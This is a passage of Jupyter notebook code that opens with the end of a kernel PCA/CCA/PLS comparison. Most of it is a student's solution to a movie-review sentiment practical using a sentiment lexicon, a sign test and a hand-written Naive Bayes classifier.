print('Test accuracy with PCA with a kernel matrix as input: ' + str(clf.score(P_test_k2, Y_test)))
## KPCA method (for comparison purposes)
# 1. Train KPCA and project the data
# (using the same gamma as in the rbf_kernel call above, so both routes are comparable)
pca_K = KernelPCA(n_components=N_feat_max, kernel="rbf", gamma=1)
pca_K.fit(X_train)
P_train_k = pca_K.transform(X_train)
P_test_k = pca_K.transform(X_test)
# 2. Evaluate the projection performance
clf = svm.SVC(kernel='linear')
clf.fit(P_train_k, Y_train)
print('Test accuracy with KPCA: ' + str(clf.score(P_test_k, Y_test)))
```
** Alternative KPLS and KCCA formulations **
Use the PLS and CCA methods with the kernel matrix to obtain non-linear (kernelized) supervised feature extractors.
```
###########################################################
# KCCA
###########################################################
from lib.mva import mva
# Defining parameters
N_feat_max = 2
## KCCA method
# 1. Train CCA with the kernel matrix and project the data
CCA = mva('CCA', N_feat_max)
CCA.fit(K_tr_c, Y_train, reg=1e-2)
P_train_k2 = CCA.transform(K_tr_c)
P_test_k2 = CCA.transform(K_test_c)
# 2. Evaluate the projection performance (linear SVM, as in the previous sections)
clf = svm.SVC(kernel='linear')
clf.fit(P_train_k2, Y_train)
print('Test accuracy with CCA with a kernel matrix as input: ' + str(clf.score(P_test_k2, Y_test)))
###########################################################
# KPLS
###########################################################
from sklearn.cross_decomposition import PLSSVD
# Defining parameters
N_feat_max = 2
## KPLS method
# 1. Train PLS with the kernel matrix and project the data
pls = PLSSVD(n_components=N_feat_max)
pls.fit(K_tr_c, Y_train_bin)
P_train_k2 = pls.transform(K_tr_c)
P_test_k2 = pls.transform(K_test_c)
# 2. Evaluate the projection performance (linear SVM, as in the previous sections)
clf = svm.SVC(kernel='linear')
clf.fit(P_train_k2, Y_train)
print('Test accuracy with PLS with a kernel matrix as input: ' + str(clf.score(P_test_k2, Y_test)))
```
|
github_jupyter
|
Practical 1: Sentiment Detection of Movie Reviews
========================================
This practical concerns sentiment detection of movie reviews.
In [this file](https://gist.githubusercontent.com/bastings/d47423301cca214e3930061a5a75e177/raw/5113687382919e22b1f09ce71a8fecd1687a5760/reviews.json) (80MB) you will find 1000 positive and 1000 negative **movie reviews**.
Each review is a **document** and consists of one or more sentences.
To prepare yourself for this practical, you should
have a look at a few of these texts to understand the difficulties of
the task (how might one go about classifying the texts?); you will write
code that decides whether a random unseen movie review is positive or
negative.
Please make sure you have read the following paper:
> Bo Pang, Lillian Lee, and Shivakumar Vaithyanathan
(2002).
[Thumbs up? Sentiment Classification using Machine Learning
Techniques](https://dl.acm.org/citation.cfm?id=1118704). EMNLP.
Bo Pang et al. were the "inventors" of the movie review sentiment
classification task, and the above paper was one of the first papers on
the topic. The first version of your sentiment classifier will do
something similar to Bo Pang’s system. If you have questions about it,
we should resolve them in our first demonstrated practical.
**Advice**
Please read through the entire practical and familiarise
yourself with all requirements before you start coding or otherwise
solving the tasks. Writing clean and concise code can make the difference
between solving the assignment in a matter of hours, and taking days to
run all experiments.
**Environment**
All code should be written in **Python 3**.
If you use Colab, check if you have that version with `Runtime -> Change runtime type` in the top menu.
> If you want to work in your own computer, then download this notebook through `File -> Download .ipynb`.
The easiest way to
install Python is to download
[Anaconda](https://www.anaconda.com/download).
After installation, you can start the notebook by typing `jupyter notebook filename.ipynb`.
You can also use an IDE
such as [PyCharm](https://www.jetbrains.com/pycharm/download/) to make
coding and debugging easier. It is good practice to create a [virtual
environment](https://docs.python.org/3/tutorial/venv.html) for this
project, so that any Python packages don’t interfere with other
projects.
#### Learning Python 3
If you are new to Python 3, you may want to check out a few of these resources:
- https://learnxinyminutes.com/docs/python3/
- https://www.learnpython.org/
- https://docs.python.org/3/tutorial/
Loading the Data
-------------------------------------------------------------
```
# download sentiment lexicon
!wget https://gist.githubusercontent.com/bastings/d6f99dcb6c82231b94b013031356ba05/raw/f80a0281eba8621b122012c89c8b5e2200b39fd6/sent_lexicon
# download review data
!wget https://gist.githubusercontent.com/bastings/d47423301cca214e3930061a5a75e177/raw/5113687382919e22b1f09ce71a8fecd1687a5760/reviews.json
import math
import os
import sys
from subprocess import call
from nltk import FreqDist
from nltk.util import ngrams
from nltk.stem.porter import PorterStemmer
import sklearn as sk
#from google.colab import drive
import pickle
import json
from collections import Counter
import requests
import matplotlib.pyplot as plt
import numpy as np
# load reviews into memory
# file structure:
# [
# {"cv": integer, "sentiment": str, "content": list}
# {"cv": integer, "sentiment": str, "content": list}
# ..
# ]
# where `content` is a list of sentences,
# with a sentence being a list of (token, pos_tag) pairs.
# For documentation on POS-tags, see
# https://catalog.ldc.upenn.edu/docs/LDC99T42/tagguid1.pdf
with open("reviews.json", mode="r", encoding="utf-8") as f:
reviews = json.load(f)
print(len(reviews))
def print_sentence_with_pos(s):
print(" ".join("%s/%s" % (token, pos_tag) for token, pos_tag in s))
for i, r in enumerate(reviews):
print(r["cv"], r["sentiment"], len(r["content"])) # cv, sentiment, num sents
print_sentence_with_pos(r["content"][0])
if i == 4:
break
c = Counter()
for review in reviews:
for sentence in review["content"]:
for token, pos_tag in sentence:
c[token.lower()] += 1
print("#types", len(c))
print("Most common tokens:")
for token, count in c.most_common(25):
print("%10s : %8d" % (token, count))
```
Symbolic approach – sentiment lexicon (2pts)
---------------------------------------------------------------------
**How** could one automatically classify movie reviews according to their
sentiment?
If we had access to a **sentiment lexicon**, then there are ways to solve
the problem without using Machine Learning. One might simply look up
every open-class word in the lexicon, and compute a binary score
$S_{binary}$ by counting how many words match either a positive, or a
negative word entry in the sentiment lexicon $SLex$.
$$S_{binary}(w_1w_2...w_n) = \sum_{i = 1}^{n}\text{sgn}(SLex\big[w_i\big])$$
**Threshold.** On average, reviews contain more positive than negative lexicon words (about 7.13 more positive than negative per review). To take this bias into account, you should use a threshold of **8** (roughly the bias itself), which makes it harder to classify a review as positive.
$$
\text{classify}(S_{binary}(w_1w_2...w_n)) = \bigg\{\begin{array}{ll}
\text{positive} & \text{if } S_{binary}(w_1w_2...w_n) > threshold\\
\text{negative} & \text{else }
\end{array}
$$
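As a quick sketch of the rule above (a hypothetical four-word lexicon stands in for $SLex$ here; the real `sent_lexicon` is loaded further down):

```python
# Minimal sketch of the binary decision rule; the tiny lexicon below is a
# placeholder for the real sent_lexicon parsed later in this notebook.
slex = {"good": 1, "great": 1, "bad": -1, "boring": -1}
THRESHOLD = 8

def classify_binary(tokens, threshold=THRESHOLD):
    # entries are already +1/-1, so summing them is summing sgn(SLex[w_i])
    score = sum(slex.get(t.lower(), 0) for t in tokens)
    return "positive" if score > threshold else "negative"

print(classify_binary(["great"] * 10))           # score 10 > 8  -> positive
print(classify_binary(["bad", "boring", "good"]))  # score -1     -> negative
```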
To implement this approach, you should use the sentiment
lexicon in `sent_lexicon`, which was taken from the
following work:
> Theresa Wilson, Janyce Wiebe, and Paul Hoffmann
(2005). [Recognizing Contextual Polarity in Phrase-Level Sentiment
Analysis](http://www.aclweb.org/anthology/H/H05/H05-1044.pdf). HLT-EMNLP.
#### (Q: 1.1) Implement this approach and report its classification accuracy. (1 pt)
##### This block loads the lexicon file and stores the sentiments and word types as dictionaries
```
#
# Given a line from the sentiment file
# ex. type=weaksubj len=1 word1=abandoned pos1=adj stemmed1=n priorpolarity=negative
# Returns a dictionary
# ex. {type: weaksubj, len: 1, word1: abandoned, pos1: adj, stemmed1: n, priorpolarity: negative}
#
def sentiment_line_to_dict(line):
dictionary = {}
words = line.split()
for word in words:
variable_assignment = word.split('=')
variable = variable_assignment[0]
value = variable_assignment[1]
dictionary[variable] = value
return dictionary
#
# Adds the word with the sentiment to the dictionary.
# If the word is already in the dictionary and the sentiments are conflicting,
# the sentiment will be set to 0 (neutral).
#
def add_sentiment_to_dict(sentiment_dict, word, sentiment):
if word in sentiment_dict.keys():
if not sentiment_dict[word] == sentiment:
sentiment_dict[word] = 0
else:
sentiment_dict[word] = sentiment
return sentiment_dict
#
# Adds the word with the type to the dictionary.
# If the word is already in the dictionary and the types are conflicting,
# the type will be set to 2 (neutral).
#
def add_type_to_dict(type_dict, word, word_type):
if word in type_dict.keys():
if not type_dict[word] == word_type:
type_dict[word] = 2
else:
type_dict[word] = word_type
return type_dict
#
# Converts a sentiment string: "positive", "negative", "neutral" to 1, -1 and 0 respectively.
#
def sentiment_to_score(sentiment_as_string):
if sentiment_as_string == 'positive':
return 1
if sentiment_as_string == 'negative':
return -1
return 0
#
# Converts a type string: "strongsubj", "weaksubj" to 3 and 1 respectively.
#
def type_to_score(type_as_string):
if type_as_string == 'strongsubj':
return 3
if type_as_string == 'weaksubj':
return 1
return 1
#
# Parses the lexicon file and return 2 dictionaries:
# sentiment_dict with structure: { "love": 1, "hate": -1, "butter": 0 ... }
# 1 is positive, -1 is negative, 0 is neutral.
#
# type_dict with structure: { "love": 3, "hate": 1, "butter": 2 ... }
# 3 is a strong type, 1 is a weak type and 2 marks a word that had conflicting types in the file.
#
def parse_lexicon_to_dicts():
with open("sent_lexicon", mode="r", encoding="utf-8") as file:
array_of_lines = file.readlines()
sentiment_dict = {}
type_dict = {}
for line in array_of_lines:
line_as_dict = sentiment_line_to_dict(line)
word = line_as_dict['word1']
word_type = type_to_score(line_as_dict['type'])
sentiment = sentiment_to_score(line_as_dict['priorpolarity'])
sentiment_dict = add_sentiment_to_dict(sentiment_dict, word, sentiment)
type_dict = add_type_to_dict(type_dict, word, word_type)
return sentiment_dict, type_dict
sentiment_dict, type_dict = parse_lexicon_to_dicts()
print("Loaded the file!")
```
##### This block contains the binary classification code
```
THRESHOLD = 8
#
# Given a review returns a list of all the words.
# note: all words are converted to lowercase
#
def get_words_of_review(review):
content = review['content']
words = []
for line in content:
for word_pair in line:
word = word_pair[0]
word_in_lowercase = word.lower()
words.append(word_in_lowercase)
return words
#
# Returns the binary (unaltered) score of the word;
# 1 for positive, -1 for negative, 0 for neutral or not found.
#
def get_binary_score_of_word(word):
try:
return sentiment_dict[word]
except KeyError:
# Word not in our dictionary.
return 0
#
# Given a review returns the real sentiment.
# -1 for negative, 1 for positive.
#
def get_real_sentiment_of_review(review):
if (review['sentiment'] == 'NEG'):
return -1
return 1
#
# Given a review returns 1 if it classifies it as positive, and -1 otherwise.
#
def binary_classify_review(review):
words = get_words_of_review(review)
score = 0
for word in words:
score += get_binary_score_of_word(word)
if score > THRESHOLD:
return 1
return -1
#
# Returns token_results, which is a list recording whether each prediction was correct: ['-', '+', '-', ...]
# And returns the accuracy as a percentage, e.g. 45 for 45% accuracy.
#
def binary_classify_all_reviews():
total = 0
correct = 0
token_results = []
for review in reviews:
prediction = binary_classify_review(review)
real_sentiment = get_real_sentiment_of_review(review)
if prediction == real_sentiment:
correct += 1
token_results.append('+')
else:
token_results.append('-')
total += 1
accuracy = correct / total * 100
return accuracy, token_results
binary_accuracy, binary_results = binary_classify_all_reviews()
print("Binary classification accuracy: {0:.2f}%".format(binary_accuracy))
```
If the sentiment lexicon also has information about the **magnitude** of
sentiment (e.g., *“excellent"* would have higher magnitude than
*“good"*), we could take a more fine-grained approach by adding up all
sentiment scores, and deciding the polarity of the movie review using
the sign of the weighted score $S_{weighted}$.
$$S_{weighted}(w_1w_2...w_n) = \sum_{i = 1}^{n}SLex\big[w_i\big]$$
Their lexicon also records two possible magnitudes of sentiment (*weak*
and *strong*), so you can implement both the binary and the weighted
solutions (please use a switch in your program). For the weighted
solution, you can choose the weights intuitively *once* before running
the experiment.
#### (Q: 1.2) Now incorporate magnitude information and report the classification accuracy. Don't forget to use the threshold. (1 pt)
```
#
# Returns the weighted score of the word;
# it multiplies the original score of the word with the type (strong 3, neutral 2, or weak 1).
#
def get_weighted_score_of_word(word):
try:
score = sentiment_dict[word]
word_type = type_dict[word]
return word_type * score
except KeyError:
# Word not in our dictionary.
return 0
#
# Given a review returns 1 if it classifies it as positive, and -1 otherwise.
#
def weighted_classify_review(review):
words = get_words_of_review(review)
score = 0
for word in words:
score += get_weighted_score_of_word(word)
if score > THRESHOLD:
return 1
return -1
#
# Returns token_results, which is a list recording whether each prediction was correct: ['-', '+', '-', ...]
# And returns the accuracy as a percentage, e.g. 45 for 45% accuracy.
#
def weighted_classify_all_reviews():
total = 0
correct = 0
token_results = []
for review in reviews:
prediction = weighted_classify_review(review)
real_sentiment = get_real_sentiment_of_review(review)
if prediction == real_sentiment:
correct += 1
token_results.append('+')
else:
token_results.append('-')
total += 1
accuracy = correct / total * 100
return accuracy, token_results
magnitude_accuracy, magnitude_results = weighted_classify_all_reviews()
print("Magnitude classification accuracy: {0:.2f}%".format(magnitude_accuracy))
```
#### Optional: make a barplot of the two results.
```
plt.bar("Binary", binary_accuracy)
plt.bar("Magnitude", magnitude_accuracy)
plt.ylabel("Accuracy in %")
plt.title("Accuracy of binary and magnitude classification")
plt.show()
```
Answering questions in statistically significant ways (1pt)
-------------------------------------------------------------
Does using the magnitude improve the results? Oftentimes, answering questions like this about the performance of
different signals and/or algorithms by simply looking at the output
numbers is not enough. When dealing with natural language or human
ratings, it’s safe to assume that there are infinitely many possible
instances that could be used for training and testing, of which the ones
we actually train and test on are a tiny sample. Thus, it is possible
that observed differences in the reported performance are really just
noise.
There exist statistical methods which can be used to check for
consistency (*statistical significance*) in the results, and one of the
simplest such tests is the **sign test**.
The sign test is based on the binomial distribution. Count all cases when System 1 is better than System 2, when System 2 is better than System 1, and when they are the same. Call these numbers $Plus$, $Minus$ and $Null$ respectively.
The sign test returns a $p$-value: the probability, assuming the null hypothesis is true, of observing a result at least as extreme as the one obtained.
For the two-sided sign test, it can be calculated using the following formula (we multiply by two because a two-sided test checks for significant differences in either direction):
$$2 \, \sum\limits_{i=0}^{k} \binom{N}{i} \, q^i \, (1-q)^{N-i}$$
where $$N = 2 \Big\lceil \frac{Null}{2}\Big\rceil + Plus + Minus$$ is the total
number of cases, and
$$k = \Big\lceil \frac{Null}{2}\Big\rceil + \min\{Plus,Minus\}$$ is the number of
cases with the less common sign.
In this experiment, $q = 0.5$. Here, we
treat ties by adding half a point to either side, rounding up to the
nearest integer if necessary.
#### (Q 2.1): Implement the sign test. Is the difference between the two symbolic systems significant? What is the p-value? (1 pt)
You should use the `comb` function from `scipy` and the `decimal` package for numerically stable addition in the final summation.
You can quickly verify the correctness of
your sign test code using a [free online
tool](https://www.graphpad.com/quickcalcs/binomial1.cfm).
```
from decimal import Decimal
from scipy.special import comb  # scipy.misc.comb was removed in recent scipy versions
def sign_test(results_1, results_2):
"""test for significance
results_1 is a list of classification results (+ for correct, - incorrect)
results_2 is a list of classification results (+ for correct, - incorrect)
"""
ties, plus, minus = 0, 0, 0
# "-" carries the error
for i in range(0, len(results_1)):
if results_1[i]==results_2[i]:
ties += 1
elif results_1[i]=="-":
plus += 1
elif results_2[i]=="-":
minus += 1
n = Decimal(2 * math.ceil(ties / 2.) + plus + minus)
k = Decimal(math.ceil(ties / 2.) + min(plus, minus))
summation = Decimal(0.0)
for i in range(0,int(k)+1):
summation += Decimal(comb(n, i, exact=True))
# use two-tailed version of test
summation *= 2
summation *= (Decimal(0.5)**Decimal(n))
print("the difference is",
"not significant" if summation >= 0.05 else "significant")
return summation
p_value = sign_test(binary_results, magnitude_results)
print("p_value =", p_value)
```
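Besides the online tool, the implementation can be cross-checked against `scipy.stats.binomtest` (available in scipy >= 1.7): for $q = 0.5$ its two-sided $p$-value coincides with the summation above. The counts below are made up for illustration.

```python
import math
from scipy.stats import binomtest  # scipy >= 1.7; older versions had binom_test

# Hypothetical counts: Plus=30, Minus=15, Null=5 (ties split half to each side)
plus, minus, null = 30, 15, 5
n = 2 * math.ceil(null / 2) + plus + minus   # N = 51
k = math.ceil(null / 2) + min(plus, minus)   # k = 18

# Manual two-sided p-value from the formula above (q = 0.5)
p_manual = 2 * sum(math.comb(n, i) for i in range(k + 1)) * 0.5 ** n

# scipy cross-check: for q = 0.5 the two-sided p-value is 2 * P(X <= k)
p_scipy = binomtest(k, n, p=0.5, alternative="two-sided").pvalue
print(p_manual, p_scipy)  # the two values should agree
```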
## Using the Sign test
**From now on, report all differences between systems using the
sign test.** You can think about a change that you apply to one system, as a
new system.
You should report statistical test
results in an appropriate form – if there are several different methods
(i.e., systems) to compare, tests can only be applied to pairs of them
at a time. This creates a triangular matrix of test results in the
general case. When reporting these pair-wise differences, you should
summarise trends to avoid redundancy.
Naive Bayes (8pt + 1pt bonus)
==========
Your second task is to program a simple Machine Learning approach that operates
on a simple Bag-of-Words (BoW) representation of the text data, as
described in Pang et al. (2002). In this approach, the only features we
will consider are the words in the text themselves, without bringing in
external sources of information. The BoW model is a popular way of
representing text information as vectors (or points in space), making it
easy to apply classical Machine Learning algorithms on NLP tasks.
However, the BoW representation is also very crude, since it discards
all information related to word order and grammatical structure in the
original text.
## Writing your own classifier
Write your own code to implement the Naive Bayes (NB) classifier. As
a reminder, the Naive Bayes classifier works according to the following
equation:
$$\hat{c} = \operatorname*{arg\,max}_{c \in C} P(c|\bar{f}) = \operatorname*{arg\,max}_{c \in C} P(c)\prod^n_{i=1} P(f_i|c)$$
where $C = \{ \text{POS}, \text{NEG} \}$ is the set of possible classes,
$\hat{c} \in C$ is the most probable class, and $\bar{f}$ is the feature
vector. Remember that we use the log of these probabilities when making
a prediction:
$$\hat{c} = \operatorname*{arg\,max}_{c \in C} \Big\{\log P(c) + \sum^n_{i=1} \log P(f_i|c)\Big\}$$
You can find more details about Naive Bayes in [Jurafsky &
Martin](https://web.stanford.edu/~jurafsky/slp3/). You can also look at
this helpful
[pseudo-code](https://nlp.stanford.edu/IR-book/html/htmledition/naive-bayes-text-classification-1.html).
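As a toy illustration of the log-space argmax (with made-up priors and conditional probabilities, not learned from the reviews):

```python
import math

# Hypothetical model parameters, for illustration only
priors = {"POS": 0.5, "NEG": 0.5}
cond = {  # P(f_i | c)
    "POS": {"great": 0.05, "boring": 0.001},
    "NEG": {"great": 0.01, "boring": 0.03},
}

def predict(tokens):
    # argmax over classes of log P(c) + sum_i log P(f_i | c)
    scores = {
        c: math.log(priors[c]) + sum(math.log(cond[c][t]) for t in tokens)
        for c in priors
    }
    return max(scores, key=scores.get)

print(predict(["great", "great"]))  # POS
print(predict(["boring"]))          # NEG
```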
*Note: this section and the next aim to put you in a position to replicate
Pang et al.'s Naive Bayes results. However, the numerical results
will differ from theirs, as they used different data.*
**You must write the Naive Bayes training and prediction code from
scratch.** You will not be given credit for using off-the-shelf Machine
Learning libraries.
The data contains the text of the reviews, where each document consists
of the sentences in the review, the sentiment of the review and an index
(cv) that you will later use for cross-validation. You will find the
text has already been tokenised and POS-tagged for you. Your algorithm
should read in the text, **lowercase it**, and store the words and their
frequencies in an appropriate data structure that allows for easy
computation of the probabilities used in the Naive Bayes algorithm, and
then make predictions for new instances.
#### (Q3.1) Train your classifier on (positive and negative) reviews with cv-value 000-899, and test it on the remaining reviews cv900–cv999. Report results using simple classification accuracy as your evaluation metric. Your features are the word vocabulary. The value of a feature is the count of that feature (word) in the document. (2pts)
The following code block contains our BagOfWords class
```
#
# This class represents our bag of words. It stores the words in a dictionary in the following format:
# BOW = {
# 'cat': {
# 'POS': 3, # 3 positive occurrences
# 'NEG': 1, # 1 negative occurrence
# 'P_POS': 0.001, # probability of this word occurring in a positive review
# 'P_NEG': 0.00033 # probability of this word occurring in a negative review
# },
# 'dog': {
# etc..
# }
# }
#
class BagOfWords:
def __init__(self, positive_prior):
self.positive_prior = positive_prior
self.total_positive_words = 0
self.total_negative_words = 0
self.bag_of_words = {}
#
# Adds a word to the BOW; if it is already in the BOW, it increments the occurrence count of the word.
#
def add_word(self, word, sentiment):
# Keep a count of total number of positive and negative words.
if sentiment == 'POS':
self.count_positive_word()
else:
self.count_negative_word()
# If the word is not yet in our bag of words:
# Initialize the word with 0 POS and 0 NEG occurrences.
if not word in self.bag_of_words.keys():
self.bag_of_words[word] = {}
self.bag_of_words[word]['POS'] = 0
self.bag_of_words[word]['NEG'] = 0
self.bag_of_words[word][sentiment] += 1
#
# Adds the P_POS and P_NEG to the BOW.
#
def add_probabilities(self, word, p_pos, p_neg):
if not word in self.bag_of_words.keys():
self.bag_of_words[word] = {}
self.bag_of_words[word]['POS'] = 0
self.bag_of_words[word]['NEG'] = 0
self.bag_of_words[word]['P_POS'] = p_pos
self.bag_of_words[word]['P_NEG'] = p_neg
#
# Increments the number of positive words it found by 1
#
def count_positive_word(self):
self.total_positive_words += 1
#
# Increments the number of negative words it found by 1
#
def count_negative_word(self):
self.total_negative_words += 1
#
# Returns the number of unique words in the BOW.
#
def get_n_unique_words(self):
return len(self.bag_of_words)
#
# Returns the words in the bag of words.
#
def get_words(self):
return self.bag_of_words
#
# Returns the number of occurrences of the word with the given sentiment (POS or NEG)
#
def count_occurences(self, word, sentiment):
try:
return self.bag_of_words[word][sentiment]
except KeyError:
return 0
#
# Returns the computed P_POS or P_NEG for the given word; if it is a new word, 0 is returned.
#
def get_probability(self, word, sentiment):
sentiment = "P_{}".format(sentiment)
try:
return self.bag_of_words[word][sentiment]
except KeyError:
return 0
```
The following code block contains our BayesClassifier class.
```
class BayesClassifier:
#
# use_smoothing: If True uses laplace smoothing with constant k=1
# use_stemming: If True uses stemming.
# n_grams: The largest n-gram order to use as features, e.g. if 2: both 1-grams and 2-grams are used as features;
# if 3: 1-grams, 2-grams and 3-grams are used as features.
#
def __init__(self, use_smoothing=False, use_stemming=False, n_grams=1):
self.use_smoothing = use_smoothing
self.use_stemming = use_stemming
self.n_grams = n_grams
self.stemmer = PorterStemmer()
#
# Given a list of train indices and a list of test indices trains the classifier
# and returns the accuracy (number) and the results (list of + and -).
# For question 3.2 we want to be able to indicate if we want only the POS, NEG or BOTH of a CV index.
# This is the list train_indices_sentiment and test_indices_sentiment.
# train_and_classify([1, 2, 3], [4], ["BOTH", "POS", "POS"], ["NEG"])
# will train on [1-NEG, 1-POS, 2-POS, 3-POS] and test on [4-NEG]
#
def train_and_classify(self, train_indices, test_indices, train_indices_sentiment=[], test_indices_sentiment=[]):
bag_of_words = self.train(train_indices, train_indices_sentiment)
total = 0
correct = 0
results = []
for review in self.get_relevant_reviews(test_indices, test_indices_sentiment):
prediction = self.classify(bag_of_words, review)
true_label = review['sentiment']
if prediction == true_label:
correct += 1
results.append('+')
else:
results.append('-')
total += 1
accuracy = correct / total * 100
return accuracy, results
#
# Classifies a single review, returns POS or NEG.
#
def classify(self, bag_of_words, review):
score_positive = math.log(bag_of_words.positive_prior)
score_negative = math.log(1 - bag_of_words.positive_prior)
for word in self.get_words_of_review(review):
p_pos = bag_of_words.get_probability(word, 'POS')
p_neg = bag_of_words.get_probability(word, 'NEG')
if p_pos > 0:
score_positive += math.log(p_pos)
if p_neg > 0:
score_negative += math.log(p_neg)
# This word was not in the training set so the probability is 0!
if self.use_smoothing and (p_pos == 0 or p_neg == 0):
p_pos = 1 / (bag_of_words.total_positive_words + bag_of_words.get_n_unique_words())
p_neg = 1 / (bag_of_words.total_negative_words + bag_of_words.get_n_unique_words())
score_positive += math.log(p_pos)
score_negative += math.log(p_neg)
if (score_positive > score_negative):
return "POS"
else:
return "NEG"
#
# Trains the classifier, creates a BOW with occurences and probabilities.
#
def train(self, indices, indices_sentiment):
bag_of_words = self.create_bag_of_words(indices, indices_sentiment)
for word in bag_of_words.get_words():
positive_occurences = bag_of_words.count_occurences(word, "POS")
negative_occurences = bag_of_words.count_occurences(word, "NEG")
if self.use_smoothing:
probability_pos = (positive_occurences + 1) / (bag_of_words.total_positive_words + bag_of_words.get_n_unique_words())
probability_neg = (negative_occurences + 1) / (bag_of_words.total_negative_words + bag_of_words.get_n_unique_words())
else:
if bag_of_words.total_positive_words == 0:
probability_pos = 0
else:
probability_pos = positive_occurences / bag_of_words.total_positive_words
if bag_of_words.total_negative_words == 0:
probability_neg = 0
else:
probability_neg = negative_occurences / bag_of_words.total_negative_words
bag_of_words.add_probabilities(word, probability_pos, probability_neg)
return bag_of_words
#
# Returns a bag of word object created from the given indices.
#
def create_bag_of_words(self, indices, indices_sentiment):
bag_of_words = BagOfWords(self.get_positive_prior(indices, indices_sentiment))
relevant_reviews = self.get_relevant_reviews(indices, indices_sentiment)
for review in relevant_reviews:
for word in self.get_words_of_review(review):
bag_of_words.add_word(word, review['sentiment'])
return bag_of_words
#
# Given the train indices, gets the positive prior. (positive reviews / total reviews)
#
def get_positive_prior(self, indices, indices_sentiment):
n_positive = 0
n_total = 0
for review in reviews:
if not review['cv'] in indices:
continue
if len(indices_sentiment) > 0:
if indices_sentiment[indices.index(review['cv'])] != "BOTH":
if indices_sentiment[indices.index(review['cv'])] != review['sentiment']:
continue
if review['sentiment'] == 'POS':
n_positive += 1
n_total += 1
return n_positive / n_total
#
# Returns a list of the relevant reviews.
# - Only reviews with the given indices
# - If self.sentiment != "BOTH" only returns reviews of the same sentiment.
#
def get_relevant_reviews(self, indices, indices_sentiment):
relevant_reviews = []
for review in reviews:
if not review['cv'] in indices:
continue
if len(indices_sentiment) > 0:
if indices_sentiment[indices.index(review['cv'])] != "BOTH":
if indices_sentiment[indices.index(review['cv'])] != review['sentiment']:
continue
relevant_reviews.append(review)
return relevant_reviews
def get_words_of_review(self, review):
words = []
for line in review['content']:
for word_pair in line:
word = word_pair[0].lower()
if self.use_stemming:
word = self.stemmer.stem(word)
words.append(word)
ngrams = []
for i in range(0, self.n_grams):
for j in range(0, len(words) - i):
ngram_word = ""
for k in range(0, i+1):
ngram_word += "{}\\".format(words[j+k])
ngrams.append(ngram_word)
return ngrams
bayes = BayesClassifier(False, False, 1)
train_indices = list(range(0,900))
test_indices = list(range(900, 1000))
simple_bayes_accuracy, simple_bayes_results = bayes.train_and_classify(train_indices, test_indices)
print("Simple (no smoothing) bayes accuracy {0:.2f}%".format(simple_bayes_accuracy))
```
#### (Bonus Questions) Would you consider accuracy to also be a good way to evaluate your classifier in a situation where 90% of your data instances are of positive movie reviews? (1pt)
You can simulate this scenario by keeping the positive reviews
data unchanged, but only using negative reviews cv000–cv089 for
training, and cv900–cv909 for testing. Calculate the classification
accuracy, and explain what changed.
```
# The question is somewhat ambiguous, but here is what we think the data should look like:
# TRAIN
# 0 - 899 : positive reviews
# 0 - 89 : negative reviews
#
# TEST
# 900 - 999 : positive reviews
# 900 - 909 : negative reviews
#
bayes = BayesClassifier(False, False, 1)
train_indices = list(range(0,900))
train_sentiment = []
# For review 0 - 89 say that we want BOTH the positive and negative reviews.
# For review 90 - 899 say that we want only the POS reviews.
for i in range(0, len(train_indices)):
if i < 90:
train_sentiment.append("BOTH")
else:
train_sentiment.append("POS")
test_indices = list(range(900, 1000))
test_sentiment = []
# For review 900 - 909 say that we want BOTH the positive and negative reviews.
# For review 910 - 999 say that we want only the POS reviews.
for i in range(0, len(test_indices)):
if i < 10:
test_sentiment.append("BOTH")
else:
test_sentiment.append("POS")
simple_negative_bayes_accuracy, simple_negative_bayes_results = bayes.train_and_classify(train_indices, test_indices, train_sentiment, test_sentiment)
print("Simple (no smoothing) bayes accuracy trained on 90% positive reviews {0:.2f}%".format(simple_negative_bayes_accuracy))
```
As you can see, the classifier now performs badly, with only 9.09% accuracy: it predicts every review as negative. Because it sees very few negative reviews during training, each negative term counts roughly ten times as much as each positive term, so many negative words end up with a high conditional probability, which explains why everything gets predicted as negative.
## Smoothing
The presence of words in the test dataset that
haven’t been seen during training can cause probabilities in the Naive
Bayes classifier to be $0$, thus making that particular test instance
undecidable. The standard way to mitigate this effect (as well as to
give more clout to rare words) is to use smoothing, in which the
probability fraction
$$\frac{\text{count}(w_i, c)}{\sum\limits_{w\in V} \text{count}(w, c)}$$ for a word
$w_i$ becomes
$$\frac{\text{count}(w_i, c) + \text{smoothing}(w_i)}{\sum\limits_{w\in V} \text{count}(w, c) + \sum\limits_{w \in V} \text{smoothing}(w)}$$
#### (Q3.2) Implement Laplace feature smoothing (1pt)
($smoothing(\cdot) = \kappa$, constant for all words) in your Naive
Bayes classifier’s code, and report the impact on performance.
Use $\kappa = 1$.
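Worked through on hypothetical counts (not taken from the review data), with the POS class containing 4 word tokens and a vocabulary of 3 types:

```python
# Add-one (Laplace) smoothing on made-up counts
counts_pos = {"great": 3, "plot": 1}   # count(w, POS)
total_pos = sum(counts_pos.values())   # sum over V of count(w, POS) = 4
vocab_size = 3                         # |V| (includes the unseen word "boring")

def p_laplace(word, k=1):
    # (count + k) / (total + k * |V|)
    return (counts_pos.get(word, 0) + k) / (total_pos + k * vocab_size)

print(p_laplace("great"))   # (3 + 1) / (4 + 3) = 4/7
print(p_laplace("boring"))  # (0 + 1) / (4 + 3) = 1/7, no longer zero
```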
```
bayes = BayesClassifier(True, False, 1)
train_indices = list(range(0,900))
test_indices = list(range(900, 1000))
smoothing_bayes_accuracy, smoothing_bayes_results = bayes.train_and_classify(train_indices, test_indices)
print("Smoothed bayes accuracy {0:.2f}%".format(smoothing_bayes_accuracy))
```
#### (Q3.3) Is the difference between non smoothed (Q3.1) and smoothed (Q3.2) statistically significant? (0.5pt)
```
p_value = sign_test(simple_bayes_results, smoothing_bayes_results)
print("p_value =", p_value)
```
## Cross-validation
A serious danger in using Machine Learning on small datasets, with many
iterations of slightly different versions of the algorithms, is that we
end up with Type III errors, also called the “testing hypotheses
suggested by the data” errors. This type of error occurs when we make
repeated improvements to our classifiers by playing with features and
their processing, but we don’t get a fresh, never-before seen test
dataset every time. Thus, we risk developing a classifier that’s better
and better on our data, but worse and worse at generalizing to new,
never-before seen data.
A simple method to guard against Type III errors is to use
cross-validation. In N-fold cross-validation, we divide the data into N
distinct chunks / folds. Then, we repeat the experiment N times, each
time holding out one of the chunks for testing, training our classifier
on the remaining N - 1 data chunks, and reporting performance on the
held-out chunk. We can use different strategies for dividing the data:
- Consecutive splitting:
- cv000–cv099 = Split 1
- cv100–cv199 = Split 2
- etc.
- Round-robin splitting (mod 10):
- cv000, cv010, cv020, … = Split 1
- cv001, cv011, cv021, … = Split 2
